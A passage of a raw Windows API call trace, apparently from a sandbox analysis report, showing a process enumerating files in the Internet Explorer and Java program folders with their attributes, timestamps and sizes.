ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a5d3f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a5d3f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2aa96b8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d665b0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d665b0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d8c70f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d8c70f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0114.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa96b8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2aa96b8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2acf818, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0114.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4239426f, ftCreationTime.dwHighDateTime=0x1ca0405, ftLastAccessTime.dwLowDateTime=0x4239426f, ftLastAccessTime.dwHighDateTime=0x1ca0405, ftLastWriteTime.dwLowDateTime=0x67fe631c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x40df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0114.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b0ea3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x68b0ea3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x68b34b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x56df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0114.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0114.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0114.411] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0114.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0114.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0114.411] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.411] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.411] CoTaskMemFree (pv=0x508980) [0114.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\en-US", lpFilePart=0x0) returned 0x2e [0114.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.412] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0114.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0114.413] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0114.413] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0114.413] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0114.413] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3537636, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf3537636, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81b77500, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0114.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3537636, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf3537636, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81b77500, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0114.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0114.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.416] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.416] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.417] CoTaskMemFree (pv=0x508980) [0114.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.417] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", lpFilePart=0x0) returned 0x2f [0114.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.417] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.417] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf227ca87, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22a2be7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0114.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf227ca87, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22a2be7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0114.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf227ca87, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22a2be7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 0 [0114.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.419] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.419] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.419] CoTaskMemFree (pv=0x508980) [0114.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.419] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java", lpFilePart=0x0) returned 0x1b [0114.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0114.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x734f7d60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x734f7d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.420] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, 